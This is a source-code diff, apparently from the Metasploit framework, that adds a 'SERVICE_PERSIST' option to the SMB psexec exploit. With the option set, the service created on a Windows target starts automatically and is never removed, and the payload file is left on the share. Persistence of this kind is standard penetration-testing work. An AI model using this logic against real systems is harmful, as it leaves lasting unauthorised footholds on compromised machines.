Auto persist

Author: Meatballs1

lib/msf/core/exploit/smb/psexec.rb

@@ -23,18 +23,34 @@ def initialize(info = {})
         OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
         OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
       ], self.class)
+
+    register_advanced_options(
+      [
+        OptBool.new('SERVICE_PERSIST', [ true, 'Create an Auto run service and do not remove it.', false])
+      ], self.class)
   end
 
+  # Retrieve the SERVICE_NAME option, generate a random
+  # one if not already set.
+  #
+  # @return service_name [String] the name of the service.
   def service_name
     @service_name ||= datastore['SERVICE_NAME']
     @service_name ||= rand_text_alpha(8)
   end
 
+  # Retrieve the SERVICE_DISPLAY_NAME option, generate a random
+  # one if not already set.
+  #
+  # @return service_display_name [String] the display name of the service.
   def display_name
     @display_name ||= datastore['SERVICE_DISPLAY_NAME']
     @display_name ||= rand_text_alpha(16)
   end
 
+  # Retrieve the SERVICE_DESCRIPTION option
+  #
+  # @return service_description [String] the service description.
   def service_description
     @service_description ||= datastore['SERVICE_DESCRIPTION']
   end
@@ -89,8 +105,14 @@ def psexec(command, disconnect=true)
 
     return false unless scm_handle
 
+    if datastore['SERVICE_PERSIST']
+      opts = { :start => SERVICE_AUTO_START }
+    else
+      opts = {}
+    end
+
     vprint_status("#{peer} - Creating the service...")
-    svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, {})
+    svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, opts)
 
     case svc_status
     when ERROR_SUCCESS
@@ -133,6 +155,8 @@ def psexec(command, disconnect=true)
           # Maybe we could have a force cleanup option..?
           if service_exists
             print_warning("#{peer} - Not removing service as it already existed...")
+          elsif datastore['SERVICE_PERSIST']
+            print_warning("#{peer} - Not removing service for persistance...")
           else
             vprint_status("#{peer} - Removing the service...")
             svc_status = dce_deleteservice(dcerpc, svc_handle)

modules/exploits/windows/smb/psexec.rb

@@ -196,15 +196,17 @@ def exploit
 
       psexec(file_location, false)
 
-      print_status("Deleting \\#{filename}...")
-      sleep(1)
-      #This is not really useful but will prevent double \\ on the wire :)
-      if datastore['SHARE'] =~ /.[\\\/]/
-        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-        simple.delete("\\#{fileprefix}\\#{filename}")
-      else
-        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-        simple.delete("\\#{filename}")
+      unless datastore['SERVICE_PERSIST']
+        print_status("Deleting \\#{filename}...")
+        sleep(1)
+        #This is not really useful but will prevent double \\ on the wire :)
+        if datastore['SHARE'] =~ /.[\\\/]/
+          simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+          simple.delete("\\#{fileprefix}\\#{filename}")
+        else
+          simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+          simple.delete("\\#{filename}")
+        end
       end
     end
     handler